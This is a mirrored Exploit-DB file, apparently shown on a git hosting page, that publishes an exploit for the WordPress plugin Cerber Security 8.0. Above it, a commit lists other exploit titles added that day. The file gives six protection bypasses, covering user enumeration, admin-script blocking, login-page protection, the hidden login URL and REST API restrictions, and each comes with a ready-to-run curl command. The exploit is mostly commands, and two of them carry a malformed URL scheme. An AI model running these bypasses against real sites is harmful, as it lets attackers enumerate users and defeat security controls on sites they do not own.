bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/46497.txt
Offensive Security a37e3008e5 DB: 2019-03-05 
20 changes to exploits/shellcodes

Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion

FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation
STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)

symphony CMS 2.3 - Multiple Vulnerabilities
Symphony CMS 2.3 - Multiple Vulnerabilities

Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities

Raisecom  XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution

zzzphp CMS 1.6.1 - Cross-Site Request Forgery

Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)

Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)

OOP CMS BLOG 1.0 - Multiple SQL Injection

OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery
CMSsite 1.0 - Multiple Cross-Site Request Forgery
elFinder 2.1.47 - Command Injection vulnerability in the PHP connector
MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal
Bolt CMS 3.6.4 - Cross-Site Scripting
Craft CMS 3.1.12 Pro - Cross-Site Scripting
WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities
Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting

Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)

Linux/x64 - Kill All Processes Shellcode (11 bytes)

Linux/x86 - iptables -F Shellcode (43 bytes)
2019-03-05 05:01:50 +00:00

65 lines
No EOL
1.6 KiB
Text
Raw Blame History

# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities
# Type: WordPress Plugin
# Date: 2019-03-04
# Active installs: 100,000+
# Version: 8.0
# Software Link: https://wordpress.org/plugins/wp-cerber/
# Exploit Author: ed0x21son
# Category: WebApps, WordPress
# Tested on: Linux/WordPress 5.1
[Vulnerabilities]
#1: Stop user enumeration bypass:
U can bypass user enumeration protection if u use Post method instead of Get.
curl http://localhost/ -d author=1
#2: Protect admin scripts bypass:
U can bypass admin scripts protection if u add one or more slashes to the uri.
curl 'http://localhost/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils'
curl 'http://localhost/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar'
#3: Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass:
U can bypass this protection if u encode any character in the uri.
curl http://localhost/wp-login%2ephp
curl -v http://localhost/wp-signup%2ephp
curl -v http://localhost/wp-register%2ephp
#4: Hide login URL bypass:
U can bypass if u encode any character in the uri, Cerber will return the secret slug in the Location header field.
curl -I http://localhost/wp-%61dmin/
#5: Stop user enumeration via REST API bypass:
U can bypass if u insert /index.php/ between domain and rest route.
curl http:/localhost/index.php/wp-json/wp/v2/users/
#6: Disable REST API bypass:
Same above.
curl http:/localhost/index.php/wp-json/wp/v2/
--ed0x21son
Reference in a new issue View git blame Copy permalink